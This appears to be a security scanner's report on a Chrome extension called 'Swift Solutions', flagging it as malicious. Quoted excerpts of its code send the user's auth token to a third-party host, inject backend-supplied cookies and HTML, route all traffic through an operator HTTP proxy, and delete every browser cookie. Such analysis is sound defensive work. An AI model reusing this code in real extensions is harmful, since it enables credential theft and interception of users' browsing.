Extension Auditor
Extension Auditor
Sign Up
Swift Solutions

Swift Solutions

ID: dfccmegcgoefkhnaeeodbakclihfipbo

Supported Languages

🇺🇸English

Extension Info & Metadata

Status
Active
Version
1.0.2
Size
0.20 MB
Rating
0.0/5
Reviews
0
Users
39
Type
Extension
Updated
Jun 23, 2026
Category
Developer tools
Price
Free
Featured
No
Visibility
Listed
Mature
No
By Google
No
Trusted
No
Download CRX
Chrome Web Store
Report Issue

Publisher Contextual Analysis

Author
RTN GlobalView Profile
Privacy
Privacy Policy
Country
US
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
Yes
Mailbox exists
Yes
Address
1209 Mountain Rd Pl NE ste r Albuquerque, NM 87110-7845 US
Website
Visit
Total Extensions
6
Active
4
Obsolete
2
Listed
6
Unlisted
0
Total Users
212
Screenshot 1

Manage browser data efficiently

Item
Type
Severity
Description
scripting
Permission
Critical
This permission allows injection and execution of JavaScript on any webpage. Rated Critical because it can modify page content, steal sensitive data, and inject malicious code into any site the extension has access to.
proxy
Permission
Critical
This permission allows the extension to control the browser's proxy settings. Rated Critical because it can route all traffic through potentially malicious proxies, enabling man-in-the-middle attacks and traffic monitoring.
webRequest
Permission
Critical
This permission enables the extension to monitor and analyze all web requests made by the browser. Rated Critical because it can observe all network traffic including sensitive data, track browsing behavior, and gather authentication tokens.
webRequestAuthProvider
Permission
Critical
This permission allows the extension to handle authentication requests and modify authentication headers. Rated Critical because it can intercept login credentials, session tokens, and modify authentication flows to compromise accounts.
declarativeNetRequest
Permission
Critical
This permission allows the extension to define rules to block, redirect, or modify network requests. Rated Critical because it can control all network traffic, potentially blocking security updates or redirecting to malicious sites.
<all_urls>
Host
Critical
Broad host access — the extension can read/modify content on every website.
cookies
Permission
High
This permission provides full access to read and modify browser cookies. Rated High because it can steal session tokens, modify authentication cookies, and compromise accounts across websites.
Dangerous Permission Combination: scripting,cookies,webRequest
Risk Factor
High
Enables extensions to interact with scripts, modify files and downloads, and alter browsing history and bookmarks, potentially affecting data integrity and user control.
Contextual Risk Factors
Risk Factor
High
The following context increases the overall risk:• 20% increase: Access to sensitive domains increases potential impact• 10% increase: Early script execution enables pre-emptive content manipulation
Broad Host Permissions
Risk Factor
High
This extension has broad host permissions allowing it to access many or all websites.
Broad Content Script Access
Risk Factor
High
This extension can inject scripts into any website.
storage
Permission
Medium
This permission allows storing data locally in the browser. Rated Medium because it can persist sensitive user data, track user activities over time, and potentially store malicious payloads.
tabs
Permission
Medium
This permission enables tab management and monitoring. Rated Medium because it can track open tabs, access tab metadata, and monitor user browsing patterns.
management
Permission
Medium
This permission manages other installed extensions. Rated Medium because it can enable/disable other extensions and modify their settings, with changes being visible to users.
*://*.dat.com/*
Host
Medium
Host permission — access limited to this URL pattern.
*://dat.com/*
Host
Medium
Host permission — access limited to this URL pattern.
*://one.dat.com/*
Host
Medium
Host permission — access limited to this URL pattern.
*://login.dat.com/*
Host
Medium
Host permission — access limited to this URL pattern.
*://script.google.com/*
Host
Medium
Host permission — access limited to this URL pattern.
*://script.googleusercontent.com/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.google.com/*
Host
Medium
Host permission — access limited to this URL pattern.
Access to Sensitive Domains
Risk Factor
Medium
This extension requests access to sensitive domains: *://script.google.com/*, *://script.googleusercontent.com/*, *://*.google.com/*
Early Content Script Execution
Risk Factor
Medium
This extension runs content scripts at document_start.

The user's authentication token (granting full access to their account on the operator backend) is appended as a plaintext URL query parameter when opening `https://datgo.vercel.app`. This domain is not in the extension's declared backend list (`apexskillzone.com`, `kmldigital.xyz`) and is a third-party Vercel-hosted service. URL query parameters are logged by server access logs, browser history, and referrer headers, exfiltrating live credentials to an undisclosed third party.

popup.js (Line 709)
async handleOpenWebDashboard() {    try {      const result = await chrome.storage.local.get(['token']);      const token = result.token;      const userId = this.currentUser?._id || '';      const webUrl =        `https://datgo.vercel.app?token=${encodeURIComponent(token)}&userId=${encodeURIComponent(userId)}`;      // For Chrome extension      if (typeof chrome !== 'undefined' && chrome.tabs && chrome.tabs.create) {        chrome.tabs.create({          url: webUrl        });      } else {        window.open(webUrl, '_blank');      }

`clearBrowserData()` is invoked without a domain argument at line 741 (inside `openDatSessionWithData`). It calls `chrome.cookies.getAll({})` with an empty object, which returns every cookie from every domain in the browser. The loop then removes all of them. This silently logs the user out of every website they are signed into every time they click 'Open DAT', far exceeding the extension's stated scope of managing dat.com session data.

background.js (Line 786)
async function clearBrowserData(domain) {    try {      const allCookies = await chrome.cookies.getAll({});      for (const cookie of allCookies) {        try {          let normalizedDomain = cookie.domain.replace(/^\./, '');          const urlAttempts = [];          if (cookie.domain.startsWith('.')) {            urlAttempts.push(`https://one${cookie.domain}${cookie.path || '/'}`);            urlAttempts.push(`https://www${cookie.domain}${cookie.path || '/'}`);            urlAttempts.push(`https://login${cookie.domain}${cookie.path || '/'}`);          } else {            urlAttempts.push(`https://${normalizedDomain}${cookie.path || '/'}`);          }          let removed = false;          for (const cookieUrl of urlAttempts) {            try {              await chrome.cookies.remove({                url: cookieUrl,                name: cookie.name              });              removed = true;              break;

The backend endpoint `/ui/open-web-button` returns an object with a `button.html` field that is injected verbatim into the extension popup via `innerHTML` without any sanitization. The extension popup runs in a privileged context with access to all Chrome extension APIs. A compromised or malicious backend can deliver HTML containing event-handler attributes or script tags that execute arbitrary code with full extension privileges, enabling cookie theft, proxy manipulation, and tab control.

popup.js (Line 674)
if (response.data && response.data.success && response.data.button) {  this.webButtonData = response.data.button;  // Update the button HTML if it exists  const webBtnContainer = document.getElementById('webButtonContainer');  if (webBtnContainer) {    webBtnContainer.innerHTML = response.data.button.html;    webBtnContainer.style.display = 'block';    // Add event listener to the button after it's inserted    const openWebBtn = document.getElementById('openWebBtn');    if (openWebBtn) {      openWebBtn.addEventListener('click', () => this.handleOpenWebDashboard());    }  }

The extension downloads stored browser session cookies for a named session ID from the operator's backend server and then injects them into the browser (`injectCookies` at line 828). This means the operator holds dat.com session credentials server-side and distributes them to extension users on demand, which constitutes centralized credential warehousing and session cloning. The same mechanism could be abused to inject cookies for any domain the backend chooses to serve, since the injection function is domain-agnostic.

background.js (Line 654)
async function loadCookiesData(sessionId) {  try {    const result = await chrome.storage.local.get(['token']);    const token = result.token;    if (!token) {      throw new Error('No user token found');    }    const response = await fetchWithFailover(`/file/cookies/${sessionId}`, {      method: 'GET',      headers: {        'Content-Type': 'application/json',        'Authorization': token      }    });    ...    const cookiesData = await response.json();    return cookiesData;  } catch (error) {    ...  }}

The extension fetches proxy credentials from `api.kmldigital.xyz` and sets a system-wide HTTP proxy for all browser traffic. The bypass list excludes Google and the operator's own API but routes all other traffic through an operator-controlled server. Because the proxy scheme is `http` (not HTTPS), the proxy server can observe and modify unencrypted traffic in plaintext, and because it applies to `<all_urls>` beyond dat.com, this is a man-in-the-middle position on the user's general browsing traffic whenever the extension is active.

utils/proxyService.js (Line 9)
const PROXY_CONFIG_API_URL = 'https://api.kmldigital.xyz/proxy/config';const PROXY_BYPASS_LIST = [  'localhost',  '127.0.0.1',  'script.google.com',  'script.googleusercontent.com',  '*.google.com',  '*.googleapis.com',  '*.gstatic.com',  '*.googleusercontent.com',  'api.kmldigital.xyz'];...async function applyProxy(config) {    ...    await chrome.proxy.settings.set({      value: {        mode: 'fixed_servers',        rules: {          singleProxy: {            scheme: 'http',            host: config.host,            port: config.port          },          bypassList: PROXY_BYPASS_LIST        }      },      scope: 'regular'    });

By severity

Critical1
High4
Medium0
Low0

Versions scanned

Showing 1 of 2 scanned versions with more than one unique finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
1.0.25

Files with findings

3 distinct paths — top paths by unique finding count:

  • background.js2
  • popup.js2
  • utils/proxyService.js1
S.No.
Category
Severity
File
Summary
Found in Version
1Credential Theft
critical
popup.js (line 709)The user's authentication token (granting full access to their account on the operator backend) is appended as a plaintext URL query parameter when opening `https://datgo.vercel.app`. This domain is not in the extensi…
1.0.2
2Code Injection
high
popup.js (line 674)The backend endpoint `/ui/open-web-button` returns an object with a `button.html` field that is injected verbatim into the extension popup via `innerHTML` without any sanitization. The extension popup runs in a privil…
1.0.2
3Credential Theft
high
background.js (line 654)The extension downloads stored browser session cookies for a named session ID from the operator's backend server and then injects them into the browser (`injectCookies` at line 828). This means the operator holds dat.…
1.0.2
4Network Interception
high
utils/proxyService.js (line 9)The extension fetches proxy credentials from `api.kmldigital.xyz` and sets a system-wide HTTP proxy for all browser traffic. The bypass list excludes Google and the operator's own API but routes all other traffic thro…
1.0.2
5Other
high
background.js (line 786)`clearBrowserData()` is invoked without a domain argument at line 741 (inside `openDatSessionWithData`). It calls `chrome.cookies.getAll({})` with an empty object, which returns every cookie from every domain in the b…
1.0.2
URLs
15
IPv4
1
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

Sign In
wa.me/$%7Bdigits%7D%60,https://wa.me/${digits}`,
one${cookie.domain}${cookie.path-https://one${cookie.domain}${cookie.path
www${cookie.domain}${cookie.path-https://www${cookie.domain}${cookie.path
login${cookie.domain}${cookie.path-https://login${cookie.domain}${cookie.path
${cookie.domain.replace(/^/,https://${cookie.domain.replace(/^\./,
login.dat.com-https://login.dat.com
dat.com-https://dat.com
datgo.vercel.app-https://datgo.vercel.app?token=${encodeURIComponent(token
api.kmldigital.xyz/proxy/confighttps://api.kmldigital.xyz/proxy/config
datbackend.apexskillzone.com-https://datbackend.apexskillzone.com
Showing 1 to 10 of 20 rows
Rows per page:

Gain full insight into all external connections.

Upgrade for full visibility.

Sign In
127.0.0.1
IPv4
-
Version
Size
Is Malicious
Findings
Permhash
1.0.2
Latest
0.20 MB
Malicious
5
4aa1dd0d14b530dd1a38d7dfdd01dc4469f43aa2694ec1015e080c8ee782e3f1
1.0.1
0.20 MB
Benign
—
4aa1dd0d14b530dd1a38d7dfdd01dc4469f43aa2694ec1015e080c8ee782e3f1
Showing 1 to 2 of 10 rows
Rows per page:

Code Diff

Compare extension code between any two versions.

0 changed files (scanned top 25 shared text files)

No comparable text files found between these versions.

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.

Sign In